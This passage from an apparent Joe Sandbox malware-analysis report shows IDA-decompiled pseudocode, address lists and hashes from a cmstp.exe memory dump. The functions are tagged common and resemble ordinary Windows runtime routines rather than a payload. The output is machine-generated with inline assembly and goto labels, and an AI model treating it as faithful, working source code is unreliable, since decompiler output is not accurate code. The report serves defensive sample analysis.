						_t80 =  *0x51c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x519fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x050fdbe9
0x050fdbf2
0x050fdbf7
0x050fdbf9
0x050fdbfc
0x050fdc00
0x050fdc03
0x050fdc14
0x050fdd54
0x050fdd54
0x050fdd54
0x050fdc18
0x050fdc1d
0x050fdc1d
0x050fdc32
0x050fdc3b
0x050fdc3e
0x050fdc46
0x050fdd5b
0x050fdd62
0x050fdd64
0x050fdd67
0x050fdd69
0x050fdd6b
0x050fdd6e
0x050fdd70
0x050fdd73
0x050fdd73
0x00000000
0x050fdc4c
0x050fdc4e
0x05143ae3
0x05143ae8
0x05143aea
0x050fdce7
0x050fdce9
0x050fdcec
0x050fdcee
0x050fdcf0
0x050fdcf3
0x050fdcf5
0x05143af2
0x05143af5
0x05143af5
0x050fdd06
0x050fdd08
0x050fdd0b
0x050fdd12
0x05143b08
0x050fdd18
0x050fdd18
0x050fdd18
0x050fdd20
0x050fdd23
0x05143b16
0x05143b16
0x050fdd29
0x050fdd2d
0x050fdd36
0x050fdd40
0x050fdd51
0x050fdd51
0x050fdc54
0x050fdc59
0x050fdc59
0x050fdc5e
0x050fdc5e
0x050fdc63
0x050fdc66
0x050fdc6b
0x050fdc78
0x050fdc7b
0x050fdc81
0x050fdc81
0x050fdc83
0x050fdc89
0x00000000
0x00000000
0x050fdd7b
0x050fdd7b
0x050fdc8f
0x050fdc8f
0x050fdc92
0x050fdc99
0x050fdc9f
0x050fdca5
0x050fdcaa
0x050fdcaa
0x050fdcb3
0x050fdcb8
0x050fdcbb
0x050fdcc1
0x050fdccf
0x050fdcd2
0x050fdcd5
0x050fdcd7
0x050fdcda
0x050fdcdc
0x050fdcdc
0x050fdce2
0x050fdce4
0x00000000
0x050fdce4

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688befdc85a54ebf898a29926366f2b9e2e558de6b95d06cc73fd86c1a641445
Instruction ID: 27bda004e38875c0527a9b565f185360d363722f83cd1db2007efc894ec33a51
Opcode Fuzzy Hash: 688befdc85a54ebf898a29926366f2b9e2e558de6b95d06cc73fd86c1a641445
Instruction Fuzzy Hash: 0951CEB2A01616DFCB14CF68E490BAEFBF2BF48310F24815AD655E7744DB31A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 050EEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E050EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E050D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E050D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x050eef4b
0x050eef4d
0x050eef57
0x050ef0bd
0x050ef0c2
0x050ef0d2
0x050ef0d2
0x050ef0c2
0x050eef5d
0x050eef5f
0x050eef67
0x050eef6a
0x050eef6d
0x050eef74
0x050eef7f
0x050eef82
0x050eef82
0x050eef86
0x050eef88
0x050eef8c
0x050eef8f
0x050eef8f
0x050eef8f
0x00000000
0x050eef91
0x050eef93
0x050eefc4
0x050eefc4
0x050eefc4
0x050eefca
0x050eefd0
0x050ef0a6
0x00000000
0x00000000
0x050ef0af
0x0513bb06
0x0513bb0a
0x050ef0b5
0x050ef0b5
0x050ef0b5
0x050ef0b5
0x00000000
0x050eefd6
0x050eefd9
0x050ef0de
0x050ef0e2
0x050eefdf
0x050eefdf
0x050eefdf
0x050eefe5
0x0513bafc
0x0513bafc
0x050eefe5
0x050eefeb
0x050eefed
0x050ef00f
0x050ef011
0x050ef01a
0x050ef01d
0x050ef021
0x050ef028
0x050ef029
0x050ef029
0x050ef02c
0x00000000
0x050ef02c
0x050eeff3
0x050eeff9
0x050ef0ea
0x050ef0ed
0x050ef0ef
0x00000000
0x050ef0ef
0x050ef003
0x0513bb12
0x050ef045
0x050ef049
0x050ef051
0x050ef09e
0x050ef0a0
0x050ef0a0
0x050ef09e
0x050ef053
0x050ef064
0x050ef064
0x050ef06b
0x0513bb1a
0x0513bb1a
0x050ef071
0x050ef071
0x050ef07d
0x050ef082
0x050ef08f
0x050ef08f
0x050ef009
0x050ef00d
0x00000000
0x050ef00d
0x050eefd0
0x050eef97
0x050eefa5
0x050eefaa
0x00000000
0x050eefac
0x050eefac
0x050eefac
0x00000000
0x050eefb2
0x050ef036
0x050ef03a
0x050ef040
0x050ef090
0x00000000
0x050ef092
0x050ef042
0x00000000
0x050ef042
0x050eefb7
0x050eefb9
0x050eefbc
0x050eefb0
0x050eefb0
0x00000000
0x050eefbe
0x050eefbe
0x050eefc1
0x00000000
0x050eefc1
0x050eefbc
0x050eefaa
0x050eef91

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 681861cfa68a35ec24608a917b17c60bdada3a8a657333fea41f3dfca909036d
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: BA511230A0824ADFDB25CB68E0D5BAEFBF2BF45314F3881A9D44553281D375A988C751

Uniqueness

Uniqueness Score: -1.00%

Function 051A740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E051A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0512D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0511F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L050F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L050F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0511F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L050F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x051a740d
0x051a740d
0x051a7412
0x051a7413
0x051a7416
0x051a7418
0x051a741c
0x051a741f
0x051a7422
0x051a7422
0x051a7428
0x051a742a
0x051a742a
0x051a7451
0x051a7432
0x051a744f
0x051a744f
0x00000000
0x051a7434
0x051a7438
0x051a7443
0x051a7517
0x051a7517
0x051a751a
0x051a7535
0x051a7520
0x051a7527
0x051a752c
0x051a7531
0x051a7533
0x00000000
0x051a7533
0x00000000
0x051a7531
0x051a754b
0x051a754f
0x051a755c
0x051a755c
0x051a755f
0x051a7560
0x051a7561
0x051a7562
0x051a7563
0x051a7568
0x051a756a
0x051a756c
0x051a756d
0x051a756d
0x051a756f
0x051a7572
0x051a7574
0x051a7577
0x051a757c
0x051a757f
0x00000000
0x051a7551
0x051a7551
0x051a7551
0x051a7553
0x051a7553
0x051a7449
0x051a7449
0x051a744c
0x051a744c
0x00000000
0x051a744c
0x051a7443
0x051a750e
0x051a7514
0x051a7514
0x051a7455
0x051a7469
0x051a746d
0x00000000
0x051a7473
0x051a7473
0x051a7476
0x051a7480
0x051a7484
0x051a748e
0x051a7493
0x051a7493
0x051a7496
0x051a7499
0x051a74a1
0x051a74b1
0x051a74b5
0x00000000
0x051a74bb
0x051a74c1
0x051a74c1
0x051a74c4
0x051a74c5
0x051a74c6
0x051a74c7
0x051a74c8
0x051a74cd
0x00000000
0x051a74d3
0x051a74d3
0x051a74d6
0x051a74d8
0x051a74db
0x051a74dd
0x051a74e0
0x051a74e7
0x051a74ee
0x051a74ee
0x051a74f4
0x051a74f9
0x00000000
0x051a74fb
0x051a74fb
0x051a74fd
0x051a7500
0x051a7503
0x051a7505
0x051a7505
0x051a74f9
0x00000000
0x051a74cd
0x051a74b5
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 4e2798309fd6c8766b4139d4013248097c52b2808ea26f5664b40da5267f7470
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: AF516C72600606EFCB26CF54D480A96BBB5FF45304F1581AAE9099F252E371EA46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05102990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E05102990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x51aff00);
				E0512D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x50b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0511E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x50b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E051551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x50b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E05102AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E050E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E05102C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E050EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E05102AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E05102C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E05102ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0512D0D1(_t62);
				goto L28;
			}

0x05102990
0x05102992
0x05102997
0x051029a3
0x051029a6
0x051029ab
0x051029ad
0x051029b2
0x05145c80
0x051029b8
0x051029b8
0x051029bb
0x051029c0
0x051029c5
0x051029c6
0x051029c6
0x051029cb
0x00000000
0x00000000
0x051029cd
0x051029d0
0x051029d9
0x051029db
0x051029dd
0x05102a7f
0x05102a84
0x05102a87
0x05102a89
0x05145ca1
0x05145ca3
0x00000000
0x05102a8f
0x05102a8f
0x00000000
0x05102a8f
0x00000000
0x051029e3
0x051029e3
0x051029e3
0x00000000
0x051029e3
0x051029dd
0x00000000
0x051029db
0x051029e6
0x051029e9
0x051029eb
0x051029ed
0x051029f3
0x051029f5
0x051029f8
0x051029fa
0x05102a97
0x05102a9a
0x05102a9d
0x05102add
0x00000000
0x05102a9f
0x05102aa2
0x05102aa5
0x05102aa8
0x05102aab
0x05145cab
0x05145caf
0x05145cc5
0x05145cda
0x05145cdc
0x05145cdf
0x05145ce5
0x00000000
0x05145ceb
0x05145ced
0x05145cee
0x00000000
0x05145cee
0x05145cb1
0x05145cb4
0x05145cb9
0x05145cbb
0x00000000
0x05145cbd
0x05145cbd
0x00000000
0x05145cbd
0x05145cbb
0x05102ab1
0x05102ab1
0x05102ac4
0x05102ac6
0x05102ac6
0x00000000
0x05102ac6
0x05102aab
0x00000000
0x05102a00
0x05102a09
0x05102a0e
0x05102a21
0x05102a24
0x05102a35
0x05102a3a
0x05102a3d
0x05102a42
0x05102a59
0x05102a59
0x05102a5c
0x05102a5f
0x05102a5f
0x051029fa
0x051029f3
0x05102a64
0x05102a64
0x05102a6b
0x05102a6b
0x05102a6d
0x05102a72
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a252a11316d4d7f9a3a3ba4e709100655077200983164faa8774dafbc59c4f
Instruction ID: b9f5956278c9fc14c3ba376a075020db11fc61b80a71cad29ea22d5d4a4bca6a
Opcode Fuzzy Hash: 24a252a11316d4d7f9a3a3ba4e709100655077200983164faa8774dafbc59c4f
Instruction Fuzzy Hash: 4D518B35A00229DFCF25CF54C888AEEBBB6BF4C310F119055E825AB2A1C7B58D52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05104D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E05104D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x51cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0511FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x51c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0511B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L050F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E050DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0511B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0511F380(_t67 + 0xc, 0x50b5138, 0x10) == 0) {
								 *0x51c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E05104F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E05104E70(0x51c86b0, 0x5105690, 0, 0) != 0) {
					_t46 = E050DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x05104d3b
0x05104d4d
0x05104d53
0x05104d58
0x05104d65
0x05104d6c
0x05104d71
0x05104d77
0x05104d7f
0x05104d8c
0x05104d8e
0x05104dad
0x05104db0
0x05104db7
0x05104db8
0x05104db9
0x05104dba
0x05104dbb
0x05104dc1
0x05104dc8
0x05104dcc
0x05104dd5
0x05104dde
0x05104ddf
0x05104de0
0x05104de1
0x05104de6
0x05104de7
0x05104de9
0x05104df3
0x00000000
0x00000000
0x05146c7c
0x05146c8a
0x05146c8a
0x05146c9d
0x05146ca7
0x05146cac
0x05146cb2
0x05146cb9
0x00000000
0x05146cbf
0x05146cbf
0x00000000
0x05146cbf
0x05146cb9
0x05104dfb
0x05146ccf
0x05146cd3
0x05104e32
0x05104e39
0x05146ce0
0x05146cf2
0x05146cf2
0x05146ce0
0x05104e3f
0x05104e41
0x05104e51
0x05104e51
0x05104e03
0x05104e03
0x05104e09
0x05104e0f
0x05104e57
0x00000000
0x00000000
0x05104e1b
0x05104e30
0x05104e5b
0x05104e5b
0x00000000
0x05104e30
0x05104e11
0x05104e11
0x05104e16
0x00000000
0x05104e16
0x05104e01
0x00000000
0x05104e01
0x05104da5
0x05146c6b
0x00000000
0x05104dab
0x05104dab
0x00000000
0x05104dab

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e83435fafde54b3b15e4492a910d7557ae29f7636ddf82f00586be5208eb8e4
Instruction ID: 2b84283a8af68365d48358099fc9c4f9274950052a2d679a52a1c2aa79d093c7
Opcode Fuzzy Hash: 4e83435fafde54b3b15e4492a910d7557ae29f7636ddf82f00586be5208eb8e4
Instruction Fuzzy Hash: 52419171A403189EEF31DF14DC84FAAB7AAFB55610F0050A9EA45972C1DBF4ED84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05104BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E05104BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
